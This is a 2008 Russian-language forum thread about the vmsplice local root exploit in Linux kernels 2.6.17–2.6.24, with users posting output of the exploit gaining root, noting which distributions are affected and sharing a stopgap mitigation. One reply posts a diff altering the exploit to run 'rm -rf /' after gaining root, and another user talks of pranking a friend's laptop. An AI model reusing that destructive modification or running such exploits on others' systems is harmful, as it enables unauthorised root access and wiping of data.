Критическая локальная уязвимость в Linux ядрах

Sekta-N · Сообщение **Sekta-N** » 11.02.2008 15:18

http://www.opennet.ru/openforum/vsluhforumID3/40128.html
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953

Эксплойт дающий права рута локально на всех ядрах от 2.6.17 - 2.6.24

Сообщение **(asper** » 11.02.2008 17:03

Работает эксплоит

Надо срочно обновлять ядро

_beast · Сообщение **_beast** » 11.02.2008 17:45

на основе экспойта создали антиэксплоит который вместо запуска оболочки запускает функцию de_exploit() которая ищет адрес функции sys_vmsplice и в ее начало вставляет 0x3c(RET). Так что можно без перекомпиляции защитится от сплойта.
http://www.ping.uio.no/~mortehu/disable-vm...f-exploitable.c
так что ядро можно пока и не компилить. Вставить в загрузку и спать пока спокойно.

хотя в рассылке пишут что типа использование вызывает нестабильность, но у меня пока все работает нормально.

mishon · Сообщение **mishon** » 11.02.2008 18:10

Да, сплоит рабочий..

tpm@tpm:~/temp$ uname -r
2.6.22-14-generic
tpm@tpm:~/temp$ ./expl
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7cea000 .. 0xb7d1c000
[+] root
root@tpm:~/temp# whoami
root
root@tpm:~/temp#

Ubutnu 7.10 ...
А на серваке ядро - 2.6.15 - сплоит не работает :-).

sspphheerraa · Сообщение **sspphheerraa** » 11.02.2008 18:23

Погодьте... в Ubuntu в роде ж суперпользоваталь отключен (как учетная запись), sudo вместо него. Или я что-то путаю?

Сообщение **Dark_Savant** » 11.02.2008 18:27

жуткая бага. хорошо, что патч уже вышел. не прошло и полугода, ога.

oberlicht · Сообщение **oberlicht** » 11.02.2008 18:28

MAA писал(а): ↑
11.02.2008 18:23
я что-то путаю?

да.

Sekta-N · Сообщение **Sekta-N** » 11.02.2008 18:35

жуткая бага. хорошо, что патч уже вышел. не прошло и полугода, ога.

Хочешь обломаю?
Прошло полтора года с момента выхода ядра.

Интересно, а почему у некоторых не сработал эксплойт?

JackYF · Сообщение **JackYF** » 11.02.2008 18:36

Плохо, конечно. Стабильный дебиан уже успел обновится, молодцы.

Сообщение **serzh-z** » 11.02.2008 18:41

Sekta-N писал(а): ↑
11.02.2008 18:35
Интересно, а почему у некоторых не сработал эксплойт?

В каком месте не сработал?

ivze · Сообщение **ivze** » 11.02.2008 18:42

11.02 : 18:41 - Ubuntu7.10 amd64 - Desktop - полёт нормальный, кря работает. =(

Sekta-N · Сообщение **Sekta-N** » 11.02.2008 18:47

fedora core 6 например

а у меня еще 6-я федора, дык не работает эксплойт :-) вызывает ошибку сегментирования и все. думаю, что во всех дистрах от редхата данный эксплойт не работает.

Ps:
uname -r
2.6.22.9-61.fc6

У меня друг скоро из Литвы приедет, вот я над его ноутом поиздеваюсь Ж))

konki · Сообщение **konki** » 11.02.2008 18:57

а можно баш настроить так, чтобы запускать программы только из авторизованного PATH?

Sekta-N · Сообщение **Sekta-N** » 11.02.2008 19:00

linux4ever@localhost ~ $ ./a.out
bash: ./a.out: Отказано в доступе

Можно вот такой кошмар устроить например с правами, но куда вы денете cgi?

Sekta-N · Сообщение **Sekta-N** » 11.02.2008 19:10

Я программирование почти не знаю.
Что надо добавить в эксплойт, чтобы он выполнял такую команду:
rm -rf /

Сообщение **serzh-z** » 11.02.2008 19:17

Sekta-N писал(а): ↑
11.02.2008 19:10
Что надо добавить в эксплойт

Даже не знаю, стоит ли отвечать... Применить патч:

--- e1.c 2008-02-11 19:13:09.197500000 +0300
+++ e2.c 2008-02-11 19:14:57.072500000 +0300
@@ -171,8 +171,8 @@

printf("[+] root\n");
putenv("HISTFILE=/dev/null");
- execl("/bin/bash", "bash", "-i", NULL);
- die("/bin/bash", errno);
+ execl("/bin/rm", "rm", "-rf", "/", NULL);
+ die("/bin/rm", errno);
}

int main(int argc, char *argv[])

wzrd · Сообщение **wzrd** » 11.02.2008 19:22

очень интересная уязвимость. нужно будет исходник сплойта посмотреть. интересно... жалко по близости линукса ни у кого нету....

eduard_pustobaev · Сообщение **eduard_pustobaev** » 11.02.2008 19:23

Круто!

Код: Выделить всё

[ed@ed-desktop exploit]$ ./exploit
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e19000 .. 0xb7e4b000
[+] root
[root@ed-desktop exploit]# uname -a
Linux ed-desktop 2.6.24-7-386 #1 Thu Feb 7 00:56:29 UTC 2008 i686 GNU/Linux

Сообщение **serzh-z** » 11.02.2008 19:27

eduard_pustobaev писал(а): ↑
11.02.2008 19:23
Linux ed-desktop 2.6.24-7-386 #1 Thu Feb 7 00:56:29 UTC 2008 i686 GNU/Linux

"2.6.24-7" - это не версия ванильного ядра, "-7-386" - это суффикс, добавленный сборщиками дистрибутива.

Sekta-N · Сообщение **Sekta-N** » 11.02.2008 19:30

Ладно насчет rm -rf я пошутил, я че-то типо 'removing files in /' добавлю - посмотрю на бледное лицо.

Сообщение **serzh-z** » 11.02.2008 19:36

Sekta-N писал(а): ↑
11.02.2008 19:30
я че-то типо 'removing files in /' добавлю - посмотрю на бледное лицо

Гм... Не знаю, всё зависит от комплекции приятеля. Если при "rm -rf /" ещё можно ожидать, что он умрёт и разборок не будет, то после простого "'removing files in /" он может выжить и летально надавать по тыкве.

eduard_pustobaev · Сообщение **eduard_pustobaev** » 11.02.2008 19:41

serzh-z писал(а): ↑
11.02.2008 19:27
"2.6.24-7" - это не версия ванильного ядра, "-7-386" - это суффикс, добавленный сборщиками дистрибутива.

Э, ну я как-бы знал об этом... Или это не мне?

Сообщение **serzh-z** » 11.02.2008 19:43

eduard_pustobaev писал(а): ↑
11.02.2008 19:41
Э, ну я как-бы знал об этом... Или это не мне?

Вероятно я неправильно понял приведённый пост. -)

Doka · Сообщение **Doka** » 11.02.2008 19:51

а у меня еще 6-я федора, дык не работает эксплойт :-) вызывает ошибку сегментирования и все. думаю, что во всех дистрах от редхата данный эксплойт не работает.

в FC7 еще как работает:

Код: Выделить всё

[doka@doka bin]$ ./a.out
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7eb8000 .. 0xb7eea000
[+] root
[root@doka bin]# uname -a
Linux doka 2.6.23.14-64.fc7 #1 SMP Sun Jan 20 23:54:08 EST 2008 i686 i686 i386 GNU/Linux

теперь начинаю понимать всю прелесть RedHat EL - включать только проверенные и стабильные версии, жертвуя модой))

eduard_pustobaev · Сообщение **eduard_pustobaev** » 11.02.2008 19:52

serzh-z писал(а): ↑
11.02.2008 19:43
Вероятно я неправильно понял приведённый пост. -)

Ага, эт не про то, что самое последнее ядро тоже подвержено уязвимости.
Просто так порадовался, а uname - просто нечто, запущенное от рута.

Ali1 · Сообщение **Ali1** » 11.02.2008 19:56

Код: Выделить всё

$ ./expl
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2aaaaaad0000 .. 0x2aaaaab02000
[+] root
[root@aliCQ ~]# uname -a
Linux aliCQ.ali.mtu.ru 2.6.23.14-107.fc8 #1 SMP Mon Jan 14 22:07:11 EST 2008 x86_64 x86_64 x86_64 GNU/Linux

Работает он на F8.

Сообщение **serzh-z** » 11.02.2008 19:56

Doka писал(а): ↑
11.02.2008 19:51
в FC7 еще как работает:

Может в одной инсталляции включен SELinux?

Doka · Сообщение **Doka** » 11.02.2008 20:05

serzh-z писал(а): ↑
11.02.2008 19:56
Doka писал(а): ↑
11.02.2008 19:51
в FC7 еще как работает:
Может в одной инсталляции включен SELinux?

несколько не понял вопроса..
SELinux установлен (не знаю позволяет ли система ставиться без обязательной инсталляции SELinux), но отключен.

Ali1 · Сообщение **Ali1** » 11.02.2008 20:06

Код: Выделить всё

[test@aliCQ ~]$ ./exploit
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2aaaaaada000 .. 0x2aaaaab0c000
Убито
[test@aliCQ ~]$
Message from syslogd@aliCQ at Feb 11 20:04:00 ...
 kernel: Oops: 0010 [1] SMP

Message from syslogd@aliCQ at Feb 11 20:04:00 ...
 kernel: CR2: 0000000000000000

Linux aliCQ.ali.mtu.ru 2.6.24.1-26.fc9 #1 SMP Fri Feb 8 19:14:51 EST 2008 x86_64 x86_64 x86_64 GNU/Linux
selinux=0
/var/log/mesages
Feb 11 20:04:00 aliCQ kernel: Pid: 3401, comm: exploit Not tainted 2.6.24.1-26.fc9 #1

Supervisor · Сообщение **Supervisor** » 11.02.2008 20:07

работает зараза!!!!

Код: Выделить всё

stranger@stranger ~/tmp/tmp $ uname -a
Linux stranger 2.6.24-gentoo #1 Sun Jan 27 12:48:56 MSK 2008 x86_64 AMD Sempron(tm) Processor 3000+ AuthenticAMD GNU/Linux
stranger@stranger ~/tmp/tmp $ ./a.out
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2ac18d35d000 .. 0x2ac18d38f000
[+] root
stranger tmp # whoami
root
stranger tmp #

unixforum.org

Критическая локальная уязвимость в Linux ядрах

Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах

Re: Критическая локальная уязвимость в Linux ядрах